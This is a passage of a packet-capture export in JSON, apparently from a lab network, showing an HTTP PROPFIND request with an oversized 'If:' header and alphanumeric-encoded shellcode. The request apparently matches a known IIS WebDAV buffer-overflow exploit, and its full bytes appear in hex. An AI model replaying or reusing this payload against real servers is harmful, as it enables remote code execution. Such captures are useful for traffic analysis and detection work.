"tcp.segment_data": "42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "351",
|
||
"tcp.segment": "352",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1689",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:55:43:41:6a:6f:4c:67:42:61:58:5a:66:59:72:67:4a:63:50:58:52:56:42:58:64:47:70:68:44:57:5a:64:73:6b:52:70:70:4e:72:74:6f:41:71:44:70:41:51:45:6f:55:50:4f:78:78:50:44:59:6f:55:70:53:64:64:77:4f:5a:42:6c:61:6c:6e:61:49:4c:6a:51:6b:56:6f:67:46:7a:79:41:6a:50:73:73:77:6c:e7:9d:85:e5:95:8d:e6:b5:ac:e4:8d:81:e4:a5:a9:e5:99:8b:e6:b1:a6:e7:99:a5:e6:91:a9:e7:99:ad:e4:89:a2:e5:81:a9:e6:95:a5:e7:91:98:e4:9d:91:e6:a5:ad:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:99:b9:e7:85:83:e4:9d:b3:e4:b5:84:e6:99:b2:e6:89:aa:e7:a5:a6:e7:85:ad:e6:b5:93:e4:b9:b2:e4:9d:99:e5:91:82:e6:b1:8c:e4:99:ae:e4:99:8a:e5:a5:b9:e5:a5:95:e4:85:87:e7:89:89:e6:a9:86:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:58:51:42:42:78:70:64:62:58:43:6f:50:56:66:62:47:55:77:6a:4e:75:4d:75:53:41:43:6d:69:71:78:69:4f:4d:59:50:72:50:65:6b:76:56:6d:57:48:61:68:56:4a:5a:70:59:6c:41:49:43:70:71:6d:75:6c:57:6a:45:56:70:62:64:73:78:52:73:73:6d:65:47:4d:4e:64:79:6c:6b:68:47:47:48:61:4c:65:48:e6:b1:82:e5:a1:8e:e4:9d:93:e7:89:8f:e4:95:86:e7:a5:97:e6:85:82:e6:99:b1:e5:85:b2:e7:a5:a8:e7:9d:af:e5:a1:ab:e6:95:99:e7:9d:a5:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e6:a9:9a:e6:a1:8d:e4:9d:b4:e5:81:9a:e1:8f:80:e6:a0:83:e4:a9:b2:e4:a5:af:e7:9d:b3:e7:a5:b4:e6:b5:94:e4:a9:a7:e6:b5:83:e4:9d:86:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/UCAjoLgBaXZfYrgJcPXRVBXdGphDWZdskRppNrtoAqDpAQEoUPOxxPDYoUpSddwOZBlalnaILjQkVogFzyAjPsswl<77><6C><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/XQBBxpdbXCoPVfbGUwjNuMuSACmiqxiOMYPrPekvVmWHahVJZpYlAICpqmulWjEVpbdsxRssmeGMNdylkhGGHaLeH<65><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "354"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.804654000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.804654000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.004002000",
|
||
"frame.time_relative": "17.055594000",
|
||
"frame.number": "361",
|
||
"frame.len": "305",
|
||
"frame.cap_len": "305",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "291",
|
||
"ip.id": "0x0000761d",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x0000ba50",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "46199",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "46199",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "58",
|
||
"tcp.len": "239",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2120727971",
|
||
"tcp.nxtseq": "1688",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1631085856",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000200a",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:44:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:44:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868612",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000303000",
|
||
"tcp.analysis.bytes_in_flight": "1687",
|
||
"tcp.analysis.push_bytes_sent": "1687"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000624000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "360",
|
||
"tcp.segment": "361",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1687",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:61:66:67:41:69:4f:65:5a:74:69:46:6b:41:75:50:73:78:46:74:4e:47:54:59:74:65:4c:42:53:43:6e:7a:4f:6f:6f:63:6e:58:76:5a:65:66:53:42:56:4d:71:59:4f:74:4e:58:74:70:46:4c:6c:61:49:66:46:79:4a:6f:5a:68:77:7a:74:4d:50:57:70:6e:44:76:5a:70:51:5a:7a:4f:4d:7a:53:43:61:73:74:e6:ad:a7:e7:8d:a8:e6:9d:8a:e7:81:b5:e4:91:88:e7:a5:94:e5:99:b1:e4:b5:98:e4:b1:92:e4:a9:b8:e6:89:98:e4:9d:96:e7:9d:b2:e7:89:9a:e4:99:89:e5:a5:84:c8:82:c8:82:e1:8b:80:e6:a0:83:e7:89:b8:e7:85:93:e6:85:93:e6:b5:b0:e5:81:85:e4:89:a3:e6:99:b2:e4:91:aa:e4:a1:8d:e7:a1:85:e5:91:87:e5:8d:a9:e6:89:b6:e6:bd:b9:e4:b9:8d:e6:85:ab:e6:a1:90:e4:a5:99:e4:99:91:e5:85:aa:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:49:41:45:54:51:68:58:43:44:4e:51:66:6c:76:75:4e:4b:41:72:76:72:5a:79:50:4d:55:68:47:45:55:62:51:43:70:68:42:4e:41:56:48:73:4d:66:79:6a:77:6c:77:73:41:71:70:50:71:67:58:73:6e:6d:49:64:71:65:4b:54:57:63:54:41:65:65:75:68:4f:4e:51:52:51:4d:66:77:6b:62:59:6c:78:6c:4a:e4:91:8a:e6:8d:84:e5:8d:96:e7:a9:89:e5:91:ba:e4:a9:85:e4:ad:8c:e7:a9:a9:e6:89:aa:e5:91:b1:e7:89:a8:e5:95:b2:e6:89:ab:e6:a9:8f:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e7:a9:89:e7:81:95:e6:b5:82:e6:8d:a9:e1:8f:80:e6:a0:83:e6:a1:85:e7:a9:96:e5:85:a1:e7:a5:a4:e4:a5:b6:e6:85:97:e4:b1:95:e4:8d:a3:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a